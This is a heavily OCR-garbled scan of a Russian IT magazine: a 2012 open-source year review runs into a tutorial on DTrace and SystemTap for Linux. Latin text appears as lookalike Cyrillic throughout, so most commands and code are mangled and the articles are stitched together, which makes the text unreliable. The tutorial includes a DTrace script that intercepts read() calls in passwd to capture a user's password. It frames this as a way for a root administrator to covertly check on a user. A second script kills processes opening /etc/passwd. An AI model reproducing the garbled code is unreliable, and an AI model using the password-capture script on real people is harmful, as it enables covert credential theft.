Раадт, который возвестил о начале катастро- 
фы, назвал Яеб Наі и СапопісаІ предателя- 
ми и отказался от реализации безопасной 
загрузки в ОрепВБО, возложив все надежды 
на мудрость антимонопольных служб Евросою- 
за (что, в общем-то, правильно). 

Закончилась история мирно, но пессими- 
стично. В конце года Мэтью Гаррет и команда 
ореп$и$Е закончили работу и выложили в Сеть 
уже подписанный минималистичный загрузчик 
5Ыт, который может быть использован всеми 
желающими. Но мир уже не будет прежним. 



5ТЕАМ И имих 



Вторым заметным и весьма интересным 
событием 2012 года стал анонс клиента циф- 
ровой доставки игр Біеат и игрового движка 
Боигсе для платформы Ііпих. Первые слухи 
об этом появились еще в далеком 2008 году, 
когда отдающий желтизной ресурс РЬогопіх 
опубликовал информацию о найме программи- 
стов, знакомых с портированием ѴѴіпбоѵѵз-игр 
в Ііпих, в компанию Ѵаіѵе. Чуть позже те же ре- 
бята обнаружили и опубликовали информацию 
о наличии Ііпих-библиотек в составе игры ІеН 
4 Оеаб, имена которых явно намекали на су- 
ществование Ііпих-версии движка и клиента 
|ІіЬ5Іеат_арі_Ііпих.50, епдіпе_і486.5о). 



В 2010 году уже сама Ѵаіѵе опубликовала 
информацию о подготовке Боигсе и Біеапп 
для Ыпих, которая, правда, не вызвала особого 
энтузиазма среди линуксоидов. И только 
спустя два года, в июле 2012-го, Ѵаіѵе подтвер- 
дила, что примерно с 2011 года работа идет 
полным ходом, и даже открыла соответству- 
ющий блог, в котором поделилась деталями 
грандиозного начинания. Оказалось, что уже 
готов полноценный клиент популярнейшей 
игры ІеН 4 Оеасі 2 (который показывает даже 
более высокую производительность, чем 
в Ѵ\/іпсіоѵѵ5), а также клиент Біеат (бета-тести- 
рование которого началось в сентябре). 

Еще более интересная информация была 
озвучена на конференции разработчиков 
УЬипІи в Дании, где выступил с докладом 
сотрудник Ѵаіѵе Дрю Блисс. Он, например, 
рассказал о том, что Ыпих подходит для игр 
гораздо лучше, чем ѴѴіпсіоѵѵб 8, что многие 
студии заинтересованы в портировании игр 
для Ііпих и что новая версия движка Боигсе, 
вместе с играми на текущей версии движка, 
также будет доступна для Ііпих. На все эти 
высказывания не замедлил ответить Джон 
Кармак, заявив, что его компания іб Бо^іѵѵаге 
уже давно делает игры для Ііпих и это не при- 
носит ничего, кроме дополнительных издер- 
жек при разработке (к слову сказать, это тот 
же самый человек, который когда-то раскри- 
тиковал Кена Сильвермана за его воксельный 
движок ѵохіар, а теперь кодит движок ісі ТесЬ 6, 
используя те же самые технологии). 

На момент написания статьи Біеат 
для Ііпих все еще находился в стадии бета- 
тестирования, а с его помощью можно было 
приобрести 35 игр, в том числе бесплатный 
Теат Рогігевз 2, Атпезіа, ѴѴогІсі о1 Соо, Багіиз 
Бат 3 и Оагѵѵіпіа. Также Ѵаіѵе заявила о наме- 
рении создать собственную игровую консоль 
под управлением Ыпих (похоже, ради этого все 
и затевалось). 
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иміхот 




5(еат в УЬипШ 



Та самая функция Неасі-Ур Оівріау в УЬипІи 



Новая панель Оа$Ь в УЬипШ 



ЫМиХЗ.2-3.7 



За 2012 год Линус Торвальдс успел выкатить 
аж шесть обновлений ядра Ыпих. Тем не менее, 
в связи с тем что в нем уже давно перестали по- 
являться революционные изменения, назвать 
это действительно важным событием нельзя. 
Как и обычно, ядро продолжает вбирать в себя 
наработки различных компаний, улучшать 
технологии виртуализации, пополняться все 
новыми драйверами и расти, расти, расти. Если 
кратко пройтись по наиболее значимым изме- 
нениям, картина получится следующая. 

Из улучшений ядра 3.2: увеличение от- 
зывчивости десктоп-приложений в условиях 
интенсивной записи, рекурсивные снапшоты 
в Оеѵісе Маррег, поддержка процессорной 
архитектуры Оиаісоппт Нехадоп и появление 
более гибкой системы распределения и лими- 
тирования процессорного времени между про- 
цессами. В 3.3 наконец были включены патчи 
для полной поддержки платформы Апсігоісі, 
включен в ядро виртуальный коммутатор Ореп 
ѵВѵѵіІсЬ, а также появилась новая система 
агрегации сетевых интерфейсов Іеатіпд (как 
более быстрый, масштабируемый и управля- 
емый аналог Ьопсііпд) и средства управления 
сетевыми потоками, позволяющие управлять 
приоритетами сетевого трафика для различных 
приложений с помощью сдгоирз. 

В 3.4 была интегрирована поддержка х32 
АВІ, своего рода виртуальной архитектуры, по- 
зволяющей использовать 32-битную адресацию 
на 64-битных системах для экономии памяти 
и процессорного времени, а также модуль 
«ѵегііу» для Оеѵісе Маррег, позволяющий 
выполнить проверку на неизменность данных 
с точки зрения их возможного повреждения или 
модификации злоумышленниками. В 3.5 появи- 
лась поддержка контрольных сумм в файловой 
системе ехі4 для контроля целостности данных 
и новый механизм безопасности зессотр, 
позволяющий ограничить доступ приложения 
к системным вызовам (его, кстати, уже успели 
внедрить в зузіепгкі, как и генератор ОР-кодов). 



Ядро 3.6 обзавелось более производитель- 
ной реализацией протокола ТСР, режимом 
«Бизрепсі Іо ЬоіЬ», при котором система сохра- 
няет образ памяти на диск даже в том случае, 
если происходит переход в ждущий режим 
(зизрепсі). Это такая защита от разряда аккуму- 
лятора. Появилась поддержка протокола 5МВ2, 
применяемого в 1Л/іпсіоѵѵ5 Ѵізіа, 7 и 8. Ядро 
3.7, вышедшее в декабре, включило в себя 
большое количество изменений в поддержке 
АРМ, таких как возможность формирования 
универсальных АРМ-сборок ядра для разных 
платформ, поддержка архитектуры ААгсЬ64 
(АРМ64), а также порт Хеп на АРМ Согіех А15. 

По обыкновению все ядра включили в себя 
большое количество изменений, связанных 
с файловой системой Вігіз, что позволило 
разработчикам ореп5115Е в конце года назвать 
ее пригодной для повседневного использова- 
ния. Но не помешало спустя несколько дней 
обнаружить в ней 0о5-уязвимость. 



ивумти 12.04, 12.10 



Как и следовало полагать, за истекший год 
произошло два обновления дистрибутива 
УЬипІи в рамках шестимесячного цикла раз- 
работки. При этом релиз 12.04 получил статус 
1Т5, а это значит, что его поддержка будет 
продолжаться ни много ни мало пять лет. Кро- 
ме этого, ІІЬипіи 12.04 получил графическую 
оболочку Ііпііу 5, которая отличается нали- 
чием системы Неасі-ІІр Оізріау, позволяющей 
быстро запустить приложение или выбрать 
пункт меню уже запущенной программы. 

В 12.10 в оболочку Упііу также была добавлена 
возможность перетаскивать иконки в боковой 
панели, а панель ОазЬ обзавелась поддержкой 
предварительного просмотра и совершения 
быстрых действий (например, переключение 
композиции). 

Также с помощью дополнительных скрип- 
тов для рт-иІіІ5 в 12.04 была значительно 
увеличена длительность работы от батареи. 

В 12.10 из дистрибутива была окончатель- 



но выпилена ІІпііу 20, так что на системах 
без 30-ускорителя теперь используется про- 
граммный рендеринг Орепбі. Особо следует 
отметить интеграцию наработок проекта 
ѴѴеЬАррз, в результате чего веб-приложения 
теперь тесно интегрируются с системой. На- 
пример, после запуска ѴоиТиЬе воспроизве- 
дением можно управлять через мультимедиа- 
индикатор на панели, а уведомления от бтаіі 
и социальных сетей будут выглядеть неотличи 
МО от локальных уведомлений. 



ОБНОВЛЕНИЯ В СТАНЕ В50 



Действительно интересные события 2012 года 
произошли в мире В50. Мало того что ма- 
жорные обновления выкатили разработчики 
абсолютно всех ОС семейства, так еще и само 
семейство пополнилось новым представите- 
лем, имя которому Віігід. Но обо всем по по- 
рядку. 

Наиболее значимым стал релиз РгееВБО 

9.0, долгожданное обновление самой популяр- 
ной ОС клана В50. В этой версии появилось 
сразу несколько важных и давно ожидаемых 
изменений. Теперь в качестве установщика ис- 
пользуется модульный инсталлятор ВБОІпзІаіІ, 
написанный на зИеІІ, но позволяющий подклю- 
чать к себе расширения, реализующие опре- 
деленную функциональность или заменять 
существующую (он пришел на смену зузіпз^аіі, 
который использовался еще с незапамятных 
времен). В систему была добавлена новая 
реализация РАЮ, созданная поверх системы 
ОЕОМ и призванная заменить устаревший 
аіагаісі, а также система синхронной реплика- 
ции блочных устройств поверх ТСР/ІР-сетей. 
Для повышения безопасности реализована 
система Сарзісит, позволяющая приложениям 
на этапе запуска определить свои полномочия 
и поместить себя в песочницу. Кроме того, 
теперь система по умолчанию включает в себя 
компилятор ІІѴМ/СІапд с В50-лицензией, 
который в будущих релизах должен полнос- 
тью заменить собой ЗСС (это уже сделано 

в РгееВЗО-СУРРЕМТ). Посвящен этот релиз 
Деннису Ритчи, одному из создателей ІІМІХ, 
ушедшему из жизни в октябре 2011 года. 

В конце 2012 года состоялся релиз МеШБО 

6.0, доступный для 57 различных архитектур. 
Ключевым новшеством в этой версии стал 
пакетный фильтр МРР, обладающий гибкими 
средствами фильтрации трафика с учетом со- 
стояния соединения, поддержкой нескольких 



ОС NЕТВ5^/^АVА5СтРТ МОЖНО ЗАПУСТИТЬ 
ПРЯМО В БРАУЗЕРЕ БЕЗ ИСПОЛЬЗОВАНИЯ 
ЭМУЛЯТОРОВ 
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Новый пройденный рубеж 




* За последний 
год веб-браузер 
Ріге^ох успел 
обновиться аж сень 
раз и обзавестись 
шикарной 
мобильной версией 
для Ап()гоі(і. 

• В 2012 году 
Патрик Волкердинг 
представил 
четырнадцатую 
версию старейшего 
дистрибутива 
ВІаск^аге Ііпих. 
Изменений, как 
всегда, нет. Все как 
в 94-м. 



• МРІауег наконец- 
то стал стабильным. 
Разработчики 
выпустили версию 
1 . 0 . 

• Соодіе 

в кооперации с 5ат- 
випд выпустила 
отличный нетбук 
на базеСЬготе 
05 всего за 250 
долларов. Покупаем, 
ставим ОЬипІи. 
Радуемся. 



режимов трансляции адресов, включая МАРТ, 
А16, двунаправленный МАТ и форвардинг 
портов, возможностью пересборки пакетов, 
а также поддержкой дополнительных легко 
реализуемых модулей. Кроме того, появилась 
поддержка томов Ыпих ІѴМ и улучшения в ра- 
боте на многоядерных системах. Интересно, 
что уже после релиза в исходных кодах МеШБО 
появилась поддержка новой архитектуры, 
которой оказался... ^аѵа5сгір1. Теперь МеШБО 
можно запустить прямо в браузере без исполь- 
зования эмуляторов. Реализован такой порт 
с помощью трансляции языка Си в ^аѵа5сгір^ 
с помощью инструмента Еппзсгіріеп. 

Два раза за год обновилась ОгадопРІу В50, 
ключевым новшеством в которой стала опти- 
мизация 5МТ (ЗіпгшИапеоиз тиІІііНгеасІіпд), 
благодаря чему производительность 
ОС на многоядерных системах значительно 
возросла и вплотную приблизилась к Ыпих, 
оставив далеко позади все остальные В50. 

Для проекта это своего рода период взросле- 
ния, так как изначально ОС была спроекти- 
рована именно для работы на многоядерных 
системах. 

Обновилась и ОрепВБО, версия которой те- 
перь 5.2. В ОрепВВО нет мажорных и минорных 
релизов, так что это просто очередной релиз, 
который несет в себе ряд не особо серьезных 
изменений. В частности, можно отметить ряд 




Новый инсталлятор РгееВБО. Другой внутри, но не снаружи 



небольших улучшений в сетевой подсистеме, 
пакетном фильтре рС утилитах и обновление 
ОрепБВН до версии 6.0. В общем, интересного 
не так много, зато некая группа энтузиастов 
взяла ее за основу для нового проекта под на- 
званием Віігід. 

Віігід ( ѵѵѵѵѵѵ.Ыігід.огд. особое внимание 
на логотип) — это ответвление от ОрепВВО, 
нацеленное на излечение последней оттоталь- 
ного консерватизма. В частности, создатели 
уже успели перевести систему на компилятор 
ІІѴМ/СІапд вместо ббС, заменили устаревший 
СѴ5 на Зіі и повыкидывали поддержку всех ар- 
хитектур, кроме І386, АМ064 и АРМ. На будущее 
запланировано также портирование гиперви- 
зора КѴМ, портирование подсистемы журна- 
лирования \Л/АРВ1 (ѴѴгіІе АНеас) РЬузісаІ Віоск 
Іоддіпд) из МеШВО, реализация поддержки 
РІІБЕ, а также различные оптимизации. Начи- 
нание, надо сказать, интересное, но Тео не рад. 



ЧТО ЕЩЕ^ 



Конечно же, 2012 год стал не только годом 
новых релизов и шумихи вокруг ІІЕРІ и 5іеат. 
Особое место в новостях занимали сообщения 
об открытых мобильных ОС. Особенно от- 
личились компании НР и МогіІІа, выпустившие 
в свободное плавание операционную систему 
ѵѵеЬОБ и следующую по ее стопам Ріге^ох 05, 
обе полностью основаны на технологиях НТМ15 
и ЗаѵаЗсгірІ. В конце года также отметилась 
компания ЗоІІа, выпустившая 5аіІ!І5Ь, опера- 
ционную систему, основанную на наработках 
проекта Мег (бывшая МееОо) и оснащенную 
графическим интерфейсом на базе фреймвор- 
ка 0^ Апсігоісі успел обновиться до версии 4.2 
и обзавестись интеллектуальной системой 
подсказок боодіе Моѵѵ. Обо всем этом мы со- 
всем недавно писали в рубрике Х-МоЬіІе, так 
что повторяться не будем. 

Еще одним весьма значимым и даже опре- 
деляющим будущее стал первый стабильный 
релиз графической оконной системы \^ауІапсі, 
той самой легкой, производительной, простой 



и подогнанной под современные реалии замены 
X ѴѴіп()оѵѵ. \^ауІапсі развивается уже несколько 
лет, и его поддержка уже добавлена в такие 
библиотеки, как 6ТКЗ+, 01 5, 501, СІиНег и ЕРІ, 
однако до этого момента АРІ был нестабилен 
и разработчики не могли интегрировать систе- 
му в свои дистрибутивы. Теперь этот процесс 
может быть начат, о чем уже успела заявить 
компания СапопісаІ, которая собирается инте- 
грировать ѴѴауІапсі в дистрибутив ІІЬипІи 13.04. 
Зачем это нужно? Да просто для того, чтобы 
избавиться от невероятно раздувшегося и не- 
эффективного куска кода под названием Х.огд, 
идеи которого устарели так давно и настоль- 
ко неэффективны в современных условиях, 
что остается только поразиться мастерству его 
разработчиков, которые умудряются сохранить 
высокую производительность и развивать 
систему, не сломав стандарт XII. 

В середине декабря произошло весь- 
ма важное событие, на этот раз связанное 
с серверными решениями. После десяти лет 
разработки создатели 5атЬа представили 
четвертую версию своего серверного ком- 
плекса, который теперь имеет полноценную 
реализацию контроллера домена и сервиса 
Асііѵе Оігесіогу, совместимого с ѴѴіпсіоѵѵз 2000 
и клиентами на базе всех современных версий 
ѴѴіпсіоѵѵз. Все это значит, что сети на базе тех- 
нологий МІСГ050Й теперь могут быть без каких- 
либо проблем построены с использованием 
открытого софта или вовсе быть гетерогенны- 
ми (когда кластер состоит из машин на базе 
ѴѴіпсіоѵѵз и ипих/В50). 



ВЫВОДЫ 



2012 год был действительно интересным и на- 
сыщенным событиями, которых, конечно же, 
произошло гораздо больше, чем мы смогли 
описать в этой статье. Как и всегда, год по- 
казал стремительный рост Ореп 5оигсе и его 
проникновение в мэйнстрим. С каждым годом 
это проникновение становится все более глу- 
боким и быстрым. □□ 
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ВВЕДЕНИЕ 



Функции динамической трассировки под именем ОТгасе впервые 
появились в Зоіагіз 10. Прелесть этой технологии заключалась 
в том, что она объединила в себе возможности большого количе- 
ства утилит подобного рода, а именно трассировку библиотечных 
функций, сисколлов, функций ядра. При этом можно было делать 
гибкую выборку по тому или иному критерию. Эта технология пред- 
назначалась разработчикам приложений для профилировки или 
системным администраторам для анализа и расследования про- 
блем. Вот лишь несколько примеров его применения: 

• отладка ядра и приложений в реальном времени (в том числе от- 
слеживание падений приложений, нахождениеузких мест, из-за 
которых программа можеттормозить, борьба сутечками памяти); 



• расширение функционала стандартныхутилитсбора информации; 

• исследование устройства операционных систем. 

Все это появилось с внедрением ОТгасе. И было это хорошо. 

Но... в Тіпих ОТгасе официально не работал. И вовсе не из-за тех- 
нических трудностей, а из-за несовместимости лицензий (по той 
же самой причине официальный порт 2Р5 для Ііпих недоступен). 
Что тут было делать? Решили создать аналогичное средство под 
названием БузІетТар, скриптовый язык которого не сильно, но все 
же отличался от ОТгасе. Возможностей же у БузІетТар появилось 
даже больше, чем было у технологии, вдохновившей разработчи- 
ков на его написание. Для примера можно привести возможность 
устранения некоторых уязвимостей на лету. Для особо же искушен- 








ных был сделан «дуги то(іе», который позволял в том числе писать 
свои функции и использовать их в дальнейшем. 

Сначала я рассмотрю установку и использование неофициаль- 
ного порта ОТгасе, кратко опишу синтаксис его скриптового язы- 
ка О, потом расскажу про ЗузІетТар и дам примеры его применения. 



ОТРАСЕ: УСТАНОВКА 



Первым делом установим необходимые для сборки ОТгасе пакеты: 

$ зисіо ар'С-ееІ іпзіаіі руІІіоп-зо-Р'Смаге-ргорегІіез ♦-* 

ЬІБОП Лех ЬиіІсІ-еззеп-СіаІ ІіЬеІ-Р-сІеѵ 
2 ІіЫе-сІеѵ ІіЬсІмаг-Р-сІеѵ Ьіпи-СіІз-сІеѵ 

Затем скачаем последнюю версию ОТгасе (в твоем случае версия 
может быть другой), соберем и установим: 

$ ѵі/^еі: ТТ:р://сгІ5р.сІупсІп5-5егѵег.сот/риЬ/ге1еа5е/ 
меЬзі-Се/сІ -Сгасе/сІТгасе- 20121009. -Саг. Ьг2 
$ Таг x^ѵ■Р ./атгасе-20121009 
$ ссі сІТгасе- 20121009 && таке а11 
$ зисіо таке іпзТаІІ 

Необходимо отметить, что при каждом обновлении ядра ОТгасе 
нужно перекомпилировать заново. 

После этого загружаем модуль ядра ОТгасе и проверяем, 
что он загрузился: 

$ зисіо таке Іоасі 
$ зисіо /изг/зЬіп/сІТгасе -1 

Должен появиться длиннющий список возможных датчиков. 
Если его нет, что-то сделано неправильно. 



ОТРАСЕ: АРХИТЕКТУРА 



Фреймворк ОТгасе состоит из следующих частей: 

• собственно программа сіігасе, которая вызывается пользовате- 
лем и получает на вход скрипт; 

• промежуточный слой АРІ, через который сйгасе обращается к мо- 
дул ю ядра; 

• провайдеры, в большинстве случаев являющиеся модулями ядра. 
Провайдеры предоставляют датчики (ргоЬез) для получения 
данных. 

С первыми двумя пунктами все более-менее ясно. А вот про- 
вайдеры и датчики хотелось бы рассмотреть подробнее. Провай- 
деры обычно представляют собой модули ядра, каждый из которых 



предоставляет свои датчики (в случае с портом под Ыпих провай- 
дер встроен в сам модуль ОТгасе). Что такое датчик? Как явствует 
из названия, датчик — нечто, отслеживающее определенные собы- 
тия. Когда датчик отреагирует на событие, он передает управление 
ОТгасе, и уже тот совершает заданные пользователем действия. 

Но какие же действия можно задать? В основном, конечно, 
ОТгасе позволяет записывать данные с датчиков — еще бы, ведь 
это его основное предназначение. Этого тоже немало — на моем 
ОЬипІи 12.04 более 480 000 датчиков. Однако есть возможность 
совершать и некоторые другие действия. Действия эти называются 
деструктивными — по той причине, что они потенциально позволя- 
ют уронить систему. В частности, в пользовательском режиме мож- 
но запустить какую-либо программу (функция зузІетО), а в режиме 
ядра и вовсе в панику удариться (рапісП). 

Ты наверняка спросишь, есть ли возможность отслеживать 
действия в каком-либо процессе. Если ты имеешь в виду, напри- 
мер, подсчет 501-запросов, то в 501-сервере должен быть соот- 
ветствующий провайдер, который реализуется разработчиками. 

А если ты хочешь посмотреть, какие именно функции вызываются 
в конкретном процессе, ты можешь теоретически использовать 
провайдер рісі... но именно что теоретически. На практике же по- 
пытка его использовать приводила у меня к мертвому зависанию 
(в случае с ІІЬипІи 12.04) либо к панике ядра (в случае со 5сіепШіс 
Ыпих 6). Возможно, в других версиях этот провайдер работает 
нормально, но гарантировать это я не могу. 



СКРИПТОВЫМ ЯЗЫК о — ПРИМЕНЕНИЕ 



От описания архитектуры перейдем к описанию и применению 
скриптового языка ОТгасе. В самом общем случае скрипт на этом 
языке выглядит следующим образом: 

провайдер : модуль : функция : датчик 
/условие/ 

{ 

действия 

} 

Рассмотрим, что делает каждая конструкция. Первая строч- 
ка — «провайдер:модуль:функция:датчик» — уникальным образом 
идентифицирует датчик в рамках системы. Второй и третий аргу- 
мент можно опустить, обязательными являются лишь «провайдер» 
и «датчик» — которому, к слову, чаще всего назначают имя «епігу» 
или «геіигп». 

Вторая строчка — «/условие/» — описывает, при каком именно 
условии будут выполняться действия. Его тоже можно опустить — 
если оно опущено, то действия будут выполняться всегда. 



.сг^ "'/иіг/ИЬ/еііг 



^ Терминал- гошегопыі*«к(ор: */(Нгасе-201 21009 — * 

файл Правка Вцд Іерминал Переход Справка 
га -Т --/и$г/ИЬ/<игасе/(уре5.<1 ; \ 
ак()іг -р ”"/и5Г/9Ьіп/ ; \ 

іп$та11 -а 4755 -о гооТ ЬиИО/сКгасе '"‘/и5Г/$Ып/і1(гасе ; \ 
іпзгаіі -а 644 -о гооі Ьих1()/(1гй .о “"/и5г/1хЬ/(1ігасв/$СРи_ВХТ5/агіі.о 
вкОіг -р --/еіе/ ; \ 

ІТ [ I -Т “"/в»с/дТгас«.сопТ ] ; іНвп \ 

іп$Та11 -а 644 -о гост е(с/(1ггасе.сопТ ""/еіс/дІгасе.сопТ ; V 
П 

іТ [ -Т "Ьиііа/Ііпих- илаше -г'.сіТ" ]: гЬеп \ 

іпХаІІ -а 644 -о гост ЬиіІО/ІІпик- ипаас -г' 

асе ; \ 

Гі 

іп$(а11 -а 644 -о гост еТс/іо.<1 -"/ивг/ІіЬ/Отгасе 
іп$(а11 -а 644 -о гооі еІс/хсЬеіІ.О ”"/и5г/1іЬ/0ігасе 
іп$та11 -а 644 -о ГООІ еіс/иги5Т(і.() ’*''/и$г/11Ь/()(гасе 
5сгір($/акіп$(а11.р1 -о=“"/и5г/1іЬ/<1ігасв 
гоаегоа-<)е$кТор:'/<1(гасе-20121009$ $ікк> ааке 1оа<) 
тооІ5/1оа0.р1 
11:28:14 5упсш8... 

11:28:14 іоа^іп^: Ьиі1<І-3.2.0-33-8епвгіс/<1гіѵвг/<Лгасв<1гѵ.ко 
11:28:16 Ргерагіп^ $уаЬоІ5... 

11:28:16 РгоЬв5 аѵаіІаЫе: 482714 
11:28:23 Тіае: 9$ 

»-<1е$кСор:-/сІ(гасе*2012і009$ | 



Загрузка модуля ядра ОТгасе 



Перехват сисколла геаіІІІ в разз^сі 











«Действия» же описывают, что именно делать при срабатыва- 
нии датчика. Если они опущены, то по умолчанию будет следующий 
вывод: 



Процессор номер_датчика функция: датчик 



КОВЫРЯНИЕ МС 

Давай для начала напишем скрипт, который показывает, какие 
конкретно системные вызовы и сколько раз вызываются файловым 
менеджером тс: 



тс-5у5са11-соиігк.(1 

#!/ц5г/5Ып/с1‘Ьгасе 



Г* Выключаем ненужный вывод сІ'Сгасе */ 

#рга§та О ор-Сіоп циіе'Ь 
5у5са11: : :еп1:гу 
/ехеспате == "тс"/ 

{ 

/* Создаем счетчик для указанных ключей. Переменная*. 

как видишь* агрегированная */ 

@соипТ:[ріс1, 1:ісІ^ ргоЬе-Рипс] = соип1:()^ 

/* Считаем - а сколько' вызовов у нас было всего? */ 
@оѵега11__соип1: = соип1:(); 



Псевдодатчик* который используется для того* чтобы 
сделать что-то в конце выполнения сІТгасе */ 



ЕN0 

{ 



} 



/* Синтаксис функции ргіпТ-РО. аналогичен подобному 
в старом добром С */ 

ргіп1:-Р("\п%б5 %75 %205 %20$\п\п", "РІО"* "ТІО"* 
"5у5са11"* "СоипТ"); 

/* Выводим значение агрегированной переменной @соипі: */ 
ргіпТа("%бсІ %7с1 %205 %20@и\п"* @соип1:); 

/* Выводим общее количество сисколлов ♦/ 
ргіпТаС'ХпОѵегаІІ зузсаііз: %@и\п"* @оѵега11_соип1:); 



Для запуска скрипта необходимо набрать следующую команду 
(при этом надо убедиться, что модуль ядра сіігасебгѵ загружен): 



$ 5ЦСІО сІТгасе -з тс-зузсаІІ-соипТ.сІ 



ПЕРЕХВАТЫВАЕМ ПАРОЛИ И НЕ ТОЛЬКО 

Иногда бывает нужно перехватить что-то, что читает определен- 
ная программа. Для примера это может быть пароль. «Но гооі 
и так имеет доступ к паролям!» — скажешь ты. Так-то оно так, да 
только что делать сисадмину, который подозревает пользователя 
в хранении некой запрещенной инфы, но доказать этого не может. 






файл Орама Вид Іарминаа П|р«ход 


Справка 




г(м»гом>4*ак(ор:-/дггас«-20121009< імЬ (Пгас* 


-п ‘ іпаіг; 8139100: : < рпиш[ргоЬ«1илс) » соил((); }• 


(><гас«: (кісгірпоп ‘іпа<г:В1Э9(оо: : 


' м(сім4 


534 ргоЬох 


гі18іЭ9_в«(_$тат*-}* 




13 


г(І8і)9_»(аг<_жві(-г«рг 




14 


гі1в«39_»*аг*_и»Ц.зп* 




42 


ггІ8і39_|«(_ат»-са11г 




52 


г(18139_ро11-]« 




344 


г(иі39ле11-](« 




344 


гг1В1Э9_рои-пор 




344 


гі1і139_1»г_аск. і»г». 12о«»* 




360 


гі1ві39_і»г_аек. і»га. 12- 




425 


га8139_гх_іпг«ггирТ-1оск 




473 


г 1 18 1 39. іпіаг гире • 




474 


гі18139_агаг(_іаіг-]« 




486 


ГСІ81 39_*«_іп»аггир» -саі 1г 




486 


г(І8139_1п<»ггир(-1оск 




534 


гПаі39_1п(«ггирІ-пор 




818 


гП8139_г*-)* 




850 


ги8139_1*г_а<к. »*га. 12-саИг 




1145 


гив139_*х_іп»*ггир».)* 




1445 


г»іаі 39.*«_гп»*ггир3 -]п* 




1445 


г1іаі39_іп1«ггирт-]п* 




2700 


г(І8і39_«іагг_хаи-са11г 




2916 


гиаіз9_роіі-саиг 




3096 


г«І8139_гк-са11г 




3744 


ГГІВ1 Э9_іп(«ггир( -еаііг 
гоаргсш-даактор: -/4Тгас*- 20)21009$ 




4434 



Один из однострочников ОТгасе 



поскольку юзверь шифрует свои данные? На помощь приходит 
ОТгасе. Вот скрипт, который перехватывает сисколл геасіО у за- 
данной программы и выводит на экран вызывающего его первый 
аргумент — что именно он читает. 



геасізпоор.сі 
#!/изг/зЬіп/(і1;гасе -з 
#рга§та О орТіоп ^иіе■С 



/* Сохраняем входные данные сисколла */ 
зузсаіі: : іепігу 

/* Вместо использования жестко заданного параметра 
используем параметр* задаваемый пользователем */ 
/ехеспате == $$1/ 

{ 

зе1Т->з1:аг-С = ИітезТіатр; 
зе1-Р->аг§0 = аг§0; 
зе1Т->агб1 = аг§ 1 ; 
зе1-Р->аге2 = аг§2; 

} 



зузсаіі : : *геас1* : ге-Сигп 

/* Смотрим только те возвраты из сисколла геасІО* которые 
относятся к заданному приложению */ 

/зе1-Р->з-Саг1:/ 

{ 

/* Выводим результат */ 

ргіп-С-Р("геасІ: \"%5\"\п"* соруіпз-Сг(зе1-Р->аг§1*«-« 
зе1-Р->аг§2)); 



} 




СРЕДСТВА * 

ОБШИРНЫМИВОЗМОЖ^^ 










Запускать надо так: 

$ зисіо сі'Ьгасе -5 геасізпоор.сі раззмсі 

Естественно, его использование и запуск возможны только из-под 
рута. 

Рассмотрим, что же такое 5еI^>агд[0..2]. В данном случае это 
локальные переменные ОТгасе для каждого потока наблюдаемой 
программы. Если говорить точнее, то в конкретно в этом скрипте 
в них заносятся аргументы вызываемых сисколлов с тем, чтобы 
потом использовать их в функции соруіпзігі), копирующей со- 
держимое памяти по указателю в буфер ОТгасе, который находится 
в ядре. 

ОТРЫВАЕМ НОС ЛЮБОПЫТНОЙ ВАРВАРЕ 

Иногда бывают прямо противоположные задачи — запретить чте- 
ние какого-либо файла. Для решения этой задачи и предназначен 
следующий скрипт: 

ореп-кііі.сі 
#!/изг/зЬіп/сІ'Сгасе -з 

/* Включаем деструктивный режим */ 

#рга§та О орТ:іоп сІезТгисСіѵе 
#рга§та О орТіоп диіеТ 

зузсаіі : : ореп : епігу 

/* Определяем^ что аргумент у ореп() соответствует 
заданному нами файлу */ 

/зТгіп8о-Р(аг§0) == $$1/ 

{ 

/* Сохраняем переменные */ 
зе1Т->рісІ = рісі; 
ргосезз_ісІ = рісі; 

/♦ Печатаем сообщение о попытке открытия файла */ 
ргіпТ-РС'Тгуіпе ореп біе Ьу %з, РІО: %с1\п", 
ехеспате, рісі); 

./* Прибиваем процесс. Поскольку функция гаізеО 

у меня не работала^ я использовал функцию зузІетО^ 
которая вызывает заданную команду. Синтаксис 
аргументов аналогичен ргіпІТС^ */ 
зузТетС'кШ -9 %а", рісі); 

} 

зузсаіі : : кііі : геіигп 
/аг§0 == зе1Т->рісІ/ 

{ 

/* Печатаем сообщение о завершении процесса */ 
ргіпТ-Р("Ргосезз %с1 кі11есІ\п’', ргосезз ісі); 

} 

Поскольку скрипт совершает деструктивные действия, необхо- 
димо явно включить деструктивный режим. Использование этого 
скрипта, к примеру, на файле /еіс/раззѵѵб (на самом деле я крайне 
не рекомендую этого делать на работающей системе — данный 
файл открывается практически всеми приложениями, поэтому, по- 
вторяю, это только пример): 

$ зисіо сІ-1:гасе -з ореп-кіИ.сІ /е-Сс/раззмсІ 2>/Цеѵ/пи11 

СКРИПТЫ-ОДНОСТРОЧНИКИ 

ОТгасе позволяет писать и простые, но от этого не менее полезные 
скрипты-однострочники. Для примера напишем скрипт, который 
смотрит, какой процесс какие файлы открывает: 

$ зисіо сІ-Сгасе -цп 'зузсаіі: : ♦ореп*: еп-Сгу {ргіпТ-Р(" 4-« 

%д^ %з, %з\п"л рісІ, ехеспате^ соруіпз1г(аг§0))}‘ 



А вот еще один однострочник: 

$ зисіо сІТгасе -цп 'зузсаіі: :ехес*:еп1:гу4-^ 

{ ргіпТТ("%Ѵ %з %сІ\п",\л/а1ІТітез1:атр,4-^ 
соруіпз1:г(аге1), рісі); }' 

Он отслеживает запуск всех процессов и выводит время, имя ис- 
полняемого файла и РІО. 

Ну и третий однострочник, который подсчитывает, сколько 
раз какая функция вызывалась в драйвере сетевой карты (вместо 
8139ІОО подставь свой): 

$ зисіо сІТгасе -п 'іпзТг:81391оо: : 

{ @пит[ргоЬе-Рипс] = соип-С(); }' 



УСТАНОВКА 5У5ТЕМТАР 



Всем хорош ОТгасе, только порт под Ііпих у него сыроватый. По- 
этому я решил не останавливаться на нем, а перейти к описанию 
родного для Ііпих аналога — ЗузІетТар. 

БузІетТар присутствует во всех основных современных дис- 
трибутивах. Но чтобы использовать этот инструмент, необходимо 
установить еще и отладочные символы и произвести некоторые 
дополнительные действия. Рассмотрю этот процесс для ІІЬипІи 
12.04. Сперва необходимо создать файл репозитория отладочных 
символов: 

/е-Ьс/ар^/зоигсез . Изі . с1/(1с1еЬз . Из! 

сІеЬ Ы1р://с1с1еЬз.иЬип-Ьи.сот ргесізе таіп гез-^гісіесі 4 -і 

ипіѵегзе тиИіѵегзе 

сІеЬ Ь-Ь1р://сІсІеЬз.иЬип-Си.сот ргесізе-ирсІаТез таіп 4-< 
